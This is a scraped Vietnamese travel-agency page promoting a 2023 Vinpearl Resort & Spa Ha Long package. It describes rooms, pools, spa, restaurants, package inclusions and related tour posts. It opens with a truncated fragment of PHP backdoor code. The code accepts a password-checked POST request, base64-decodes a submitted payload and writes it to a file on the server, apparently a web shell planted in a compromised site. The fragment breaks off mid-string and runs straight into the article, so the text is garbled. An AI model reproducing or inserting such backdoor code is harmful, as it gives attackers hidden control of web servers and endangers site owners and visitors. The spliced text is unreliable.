function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Combo Vinpearl Hạ Long 2023 đang được săn đón nhiều nhất

Combo Vinpearl Hạ Long 2023 được săn đón nhiều nhất

15/03/2023 BaoChau

Combo Vinpearl Hạ Long 2023 mang lại một chuyến tận hưởng như ở Dubai phiên bản thu nhỏ tại Việt Nam. Vinpearl Hạ Long đang gây sốt với các dịch vụ đa dạng và view sống ảo độc đáo.

TẠI SAO VINPEARL HẠ LONG NẰM TRONG TOP KHÁCH SẠN TỐT NHẤT?

Vinpearl Resort & Spa Hạ Long thuộc sở hữu của tập đoàn Vingroup, nằm tách biệt với các khu nghỉ dưỡng khác tại đảo Rều, Bãi Cháy và cách thành phố Hạ Long 5km. Nơi đây là khu nghỉ dưỡng đẳng cấp 5 sao trên biển đầu tiên duy nhất ở miền Bắc. Vinpearl Hạ Long đang trở thành thiên đường thu nhỏ được ưa chuộng nhất “vịnh Bắc Bộ” với bãi biển bao quanh ôm lấy resort. 

Combo Vinpearl Hạ Long - Toàn cảnh Vinpearl

Toàn cảnh Vinpearl Resort & Spa Hạ Long thu hút đông đảo khách du lịch

Vinpearl Resort & Spa Hạ Long đi cùng với thiết kế tối giản, màu sắc tinh tế, resort khoác lên mình vẻ đẹp sang trọng, hiện đại. Ngoài ra, resort có phong cách nghỉ dưỡng 4 mùa, cảm hứng xây dựng từ Nhà hát thành phố Rennes (Pháp) và các dịch vụ tiện ích, nhân viên chuyên nghiệp. Combo Vinpearl Hạ Long 2023 hứa hẹn mang nhiều trải nghiệm thú vị như ở Châu Âu cho các tín đồ du lịch.

ĐI DU LỊCH KHÔNG LO NGẠI TẠI VIỆT NAM CÙNG COMBO VINPEARL HẠ LONG 2023 CÓ GÌ? 

Phương tiện di chuyển tối ưu nhất: 

  • Từ TPHCM đến Hạ Long: từ TP.HCM hoặc các tỉnh thành ở phía Nam sẽ di chuyển mất 2 tiếng bằng máy bay đến sân bay Vân Đồn – Quảng Ninh, đến nơi xe Limousine sẽ đưa du khách đến cảng Vinpearl Resort & Spa Hạ Long. 
  • Từ Hà Nội hoặc các tỉnh phía Bắc có thể tự di chuyển bằng phương tiện cá nhân (ô tô, xe máy,…) hoặc thuận tiện nhất là đi bằng xe khách, mất khoảng 30 phút đến 1 tiếng để đến thành phố Hạ Long và cảng Vinpearl Resort & Spa Hạ Long.

Với combo Vinpearl Hạ Long 2023 sẽ là lựa chọn tốt nhất cho du khách, hãy yên tâm vì đã có trọn gói vé máy bay khứ hồi và xe Limousine đưa đón tận nơi đến đảo Rều. Việc di chuyển sẽ trở nên dễ dàng hơn để quý khách có trải nghiệm tốt nhất tại đây.

>> Xem thêm: Vinpearl Resort & Spa Hạ Long

TẠI SAO VINPEARL HẠ LONG THU HÚT ĐÔNG ĐẢO KHÁCH DU LỊCH?

Vinpearl Resort & Spa Hạ Long là một trong những khu nghỉ dưỡng hàng đầu tại Quảng Ninh, tọa lạc riêng biệt trên đảo Rều. Vinpearl sở hữu cho mình bãi biển riêng cùng với tầm nhìn 360 độ hướng ra Vịnh Hạ Long. Vinpearl được xây dựng hoàn toàn trên mặt biển cùng với kiến trúc Tân cổ điển đầy lộng lẫy, màu sắc trang nhã tạo cảm giác yên tĩnh cho du khách. 

Thay vì lựa chọn “tham quan” Hạ Long thì Vinpearl sẽ làm thay đổi tư duy của du khách thành “nghỉ dưỡng” tại khu resort 5 sao trên biển đầu tiên tại khu vực phía Bắc này. Vinpearl Resort & Spa Hạ Long sở hữu cho mình một vị trí đắc địa chỉ cách Thủ đô Hà Nội hơn 3 giờ lái xe. Combo Vinpearl Hạ Long 2023 hứa hẹn mang lại cho du khách cơ hội trải nghiệm kỳ nghỉ cuối tuần chuẩn 5 sao và giá siêu tiết kiệm hợp lý nhất. 

Phòng nghỉ cao cấp 5 sao, view biển cực xịn

Tại Vinpearl Hạ Long không thể không nhắc đến các phòng nghỉ sang trọng view triệu đô, ánh sáng thiên nhiên. Phòng nghỉ và căn hộ được thiết kế được đánh giá là sang trọng nhất nhờ những chi tiết hoa văn tinh tế lấy cảm hứng từ văn hóa phương Đông với màu sắc chủ đạo là màu trắng và màu gỗ tự nhiên mang tới cảm giác thư thái.

Khu nghỉ dưỡng có 402 phòng nghỉ và 220 biệt thự tiêu chuẩn quốc tế, đáp ứng nhu cầu của các đối tượng du khách từ cá nhân tới tập thể, với các mức giá khác nhau. Còn lại là các phòng họp dành cho sự kiện, hội nghị. 

Tại Vinpearl Hạ Long, có các loại phòng như: Deluxe Rooms, Deluxe Terrace Room, Family Suite, Executive Suite, Panoramic Suites, Presidential Suite. Với combo Vinpearl Hạ Long 2023 du khách có thể thỏa thích lựa chọn cho mình một nơi ở đầy tiện nghi mà còn tiết kiệm chi phí. 

Combo Vinpearl Hạ Long - Phòng ngủ 5 sao

Phòng sang chảnh đẳng cấp 5 sao với combo Vinpearl Hạ Long 2023

Cùng với đó mỗi phòng đều thiết kế có ban công lớn, đều có trang bị đầy đủ trang thiết bị hiện đại như: máy sấy tóc, điều hòa, két sắt, smart TV, dịch vụ phòng 24 giờ, mạng tốc độ cao, giường ngủ lớn, buồng tắm đứng và bồn tắm riêng, bàn làm việc, đồ uống miễn phí tại phòng, dép đi trong phòng và áo choàng tắm,… 

Hồ bơi cùng view sống ảo siêu sang chảnh

Hồ bơi ngoài trời thiết kế hiện đại, sạch sẽ, hướng ra vịnh với diện tích 1.200m2 và nhiều góc chụp hình sống ảo cho du khách. Hồ bơi trong nhà được thiết kế với hệ thống chiếu sáng 24/7 hiện đại. Hãy đăng kí ngay combo Vinpearl Hạ Long 2023 để trải nghiệm thêm nhiều điều thú vị nhé!

Combo Vinpearl Hạ Long - Hồ bơi

Khu vực hồ bơi cùng nhiều góc sống ảo cho du khách tại Vinpearl

Hồ bơi bao gồm hồ bơi cho người lớn và trẻ em, độ sâu của hai hồ lần lượt sẽ là 1,2m và 0,6m. Tại hồ bơi đã có trang bị đầy đủ nhân viên, phao và các thiết bị cứu hộ hiện đại nhưng trẻ em nên có sự giám sát của phụ huynh khi tham gia bơi lội để đảm bảo an toàn.

>> Xem thêm: TOP 5 Combo du lịch Hạ Long – cơ hội vàng để khám phá di sản

Kid’s Club

Kid’s Club là một lựa chọn cho kỳ nghỉ hoàn hảo của các gia đình có trẻ nhỏ. Khu vui chơi dành cho trẻ em tại Vinpearl này sẽ giúp các gia đình có khả năng gắn kết với các em và cũng như bậc phụ huynh có thể an tâm để con chơi thỏa thích.

Combo Vinpearl Hạ Long - Kid's Club

Kid’s Club với không gian rộng rãi cho bé thỏa sức vui chơi

Vincharm Spa

Vincharm Spa nằm tại tầng 3 của Vinpearl được thiết kế với không gian sang trọng, ấm áp cùng sự kết hợp giữa âm nhạc với phương pháp trị liệu từ nhiều nước giúp khách hàng thư giãn giảm đau cơ, giảm stress và mang đến giấc ngủ ngon. 

Giờ mở cửa spa: 9:00 – 22:00.

Combo Vinpearl Hạ Long - Vincharm Spa

Không gian thư giãn tại Vincharm Spa với các phương pháp trị liệu 5 sao

Tại Vincharm Spa cung cấp các dịch vụ cao cấp với 14 phòng massage, chăm sóc chân, bể sục, tắm hơi, xông khô, huấn luyện viên riêng, phòng tập thể hình được trang bị hiện đại. Để trải nghiệm thêm các dịch vụ ở đây thì combo Vinpearl Hạ Long 2023 sẽ là lựa chọn hoàn hảo nhất cho du khách.

Ẩm thực độc đáo

Ngoài các dịch vụ chăm sóc giải trí trên thì với combo Vinpearl Hạ Long 2023 du khách sẽ được trải nghiệm ẩm thực đa dạng tại resort gồm 3 nhà hàng, 1 lounge và 1 bar.

  • Nhà hàng Bay View: nằm ở tầng 2 với sức chứa 350 khách, nhà hàng chuyên phục vụ 3 bữa ăn trong ngày và nhiều món ăn quốc tế bao gồm cả buffet.
  • Nhà hàng Pavilion: nằm gần vị trí hồ bơi với sức chứa 252 khách, nhà hàng có hướng nhìn ra toàn cảnh vịnh Hạ Long và chuyên phục vụ các món ăn mang dấu ấn Việt Nam.
  • Nhà hàng Akoya: nằm ở tầng 2 với sức chứa 100 khách. Nhà hàng ẩm thực Nhật Bản phục vụ các bữa trưa gọi món.
  • Pool Bar: vị trí cạnh khu vực hồ bơi với sức chứa 36 khách, bar chuyên phục vụ các món nước như cocktail nhiệt đới, rượu, kem tươi hay trà chiều. Du khách có thể tận hưởng các món nước cùng không gian biển tươi mát.
  • Pearl Lounge: vị trí ở trung tâm sảnh chính tầng 2 với sức chứa 40 khách, lounge chuyên phục vụ các món nước như trà, cà phê, bánh ngọt, các loại bia, sâm panh, rượu, cocktail và đồ ăn nhẹ.

>> Xem thêm: “Vịnh nơi rồng đáp” và gợi ý top 5 combo Hạ Long

Các hoạt động giải trí khác ngoài combo Vinpearl Hạ Long 2023

Ngoài các hoạt động bên trong Vinpearl bên ngoài du khách có thể:

  • Tham gia các hoạt động thể thao dưới nước như lướt ván, lái cano, dịch vụ lặn biển,… 
  • Chợ đêm Hạ Long cách Vinpearl 2,7 km bằng 5 phút đi xe. Với hơn một trăm gian hàng lớn nhỏ được chia làm 2 tầng, đa dạng hàng hóa như đồ lưu niệm, quần áo, giày dép, đặc sản Hạ Long,…
  • Bãi biển Bãi Cháy nằm sát Vinpearl là một bãi tắm nhân tạo, nằm dọc vịnh Hạ Long với diện tích là 500*100m. Là bãi tắm thu hút nhiều khách du lịch vì cảnh đẹp và nằm xen kẽ với các khách sạn khác.

COMBO VINPEARL HẠ LONG 2023 NHIỀU ƯU ĐÃI ĐANG ĐƯỢC SĂN ĐÓN 

Combo Vinpearl Hạ Long 2023 – 2 ngày 1 đêm (Vé máy bay + Xe Limousine)

Địa chỉ: Đảo Rều, Thành phố Hạ Long, Quảng Ninh

COMBO BAO GỒM:

– Vé máy bay khứ hồi (Khởi hành từ TP.HCM)

– Xe Limousine cao cấp khứ hồi Hà Nội – Hạ Long – Hà Nội

– Nghỉ dưỡng tại Vinpearl Resort & Spa Hạ Long đẳng cấp 5 sao

  • Phòng sang trọng có điều hòa và có ban công riêng
  • Thức uống chào mừng, khăn lạnh
  • Miễn phí buffet sáng tại nhà hàng, miễn phí Wifi toàn bộ resort
  • Tặng 1 bữa buffet trưa cho 2 người lớn/phòng
  • Tặng Hotel credit 500k/phòng/đêm (Không áp dụng với đồ uống có cồn và room service)
  • Áp dụng giảm thêm 5% cho người địa phương các tỉnh/thành phố: Quảng Ninh, Lạng Sơn, Bắc Giang, Bắc Ninh, Hải Dương, Hải Phòng, Hà Nội
  • Miễn phí nâng cấp lên phòng hướng biển cho booking ở từ 2 đêm (từ Chủ Nhật đến thứ Sáu)
  • Miễn phí nhận phòng sớm lúc 10h và trả phòng muộn lúc 16h (tùy vào tình trạng phòng trống)

Combo Hạ Long mà dideden gợi ý và hỗ trợ bạn lựa chọn combo 2 ngày 1 đêm phù hợp nhất để bạn có những trải nghiệm du lịch Hạ Long tuyệt nhất mùa hè này. Liên hệ hotline 1900 4698 để được hỗ trợ và được đội ngũ chuyên nghiệp tư vấn về combo Vinpearl Hạ Long 2023. Hãy cùng theo dõi Vietnam Booking để cập nhật các thông tin mới nhất nhé.

ĐĂNG KÍ ĐẶT COMBO VINPEARL HẠ LONG 2023

  • Tour Bình Châu 1 ngày tắm suối khoáng nóng siêu độc đáo
    Tour Bình Châu 1 ngày tắm suối khoáng nóng có đang được bạn quan tâm trong chuyến du lịch Vũng Tàu sắp tới? Chắc chắn nhiều người sẽ thắc mắc rằng đi Bình Châu thì nên tham gia những hoạt động gì, ăn gì, ở đâu? Bài viết sau đây của Đi Để Đến sẽ […]
  • Tour du lịch Vũng Tàu siêu hấp dẫn trong dịp cuối năm 2023
    Tour du lịch Vũng Tàu là lựa chọn phổ biến với những ai đang cần nạp “vitamin sea”. Vũng Tàu nổi tiếng là vùng biển yên bình, thú vị và tràn đầy sức sống. Vũng Tàu cách TP.HCM khoảng 110 km và tốn thời gian di chuyển khoảng 2 giờ. Nếu bạn đang có kế […]
  • Tất tần tật kinh nghiệm đi Tà Xùa chi tiết nhất 2023
    Tà Xùa được biết đến là thiên đường săn mây đẹp nhất ở vùng núi Tây Bắc. Theo kinh nghiệm đi Tà Xùa thì nơi đây là một trong những điểm đến được giới trẻ yêu thích nhất. Tà Xùa quanh năm được bao phủ bởi mây trắng bồng bềnh trên các đỉnh núi. Bạn […]
  • Đi Phú Quốc mùa nào đẹp? Top 10 địa điểm siêu hấp dẫn
    Đi Phú Quốc mùa nào đẹp chắc hẳn là câu hỏi mà rất nhiều người đang băn khoăn! “Đảo ngọc” Phú Quốc đang là một “thiên đường nghỉ dưỡng” được rất nhiều khách du lịch trong nước và nước ngoài săn đón. Nơi đây không chỉ thu hút du khách bởi những dãy núi non […]
  • Tour Singapore 5 ngày 4 đêm – Khám phá vẻ đẹp đảo quốc sư tử
    Singapore được biết đến là một đất nước hiện đại, năng động và phát triển. Nơi đây còn nổi tiếng với nhiều danh lam thắng cảnh và ẩm thực độc đáo. Lựa chọn tour Singapore 5 ngày 4 đêm sẽ mang đến cho bạn chuyến hành trình thú vị. Cùng Đi Để Đến khám phá […]
  • Du lịch Thái Lan đi đâu? Khám phá xứ sở chùa Vàng dịp hè 2023
    Bạn có biết du lịch Thái Lan đi đâu là thú vị nhất chưa? Những năm gần đây Thái Lan đang trở thành điểm du lịch hấp dẫn. Nơi đây còn nổi tiếng với nhiều điểm vui chơi thú vị, thu hút đông đảo du khách. Những bạn lần đầu đến Thái Lan sẽ không […]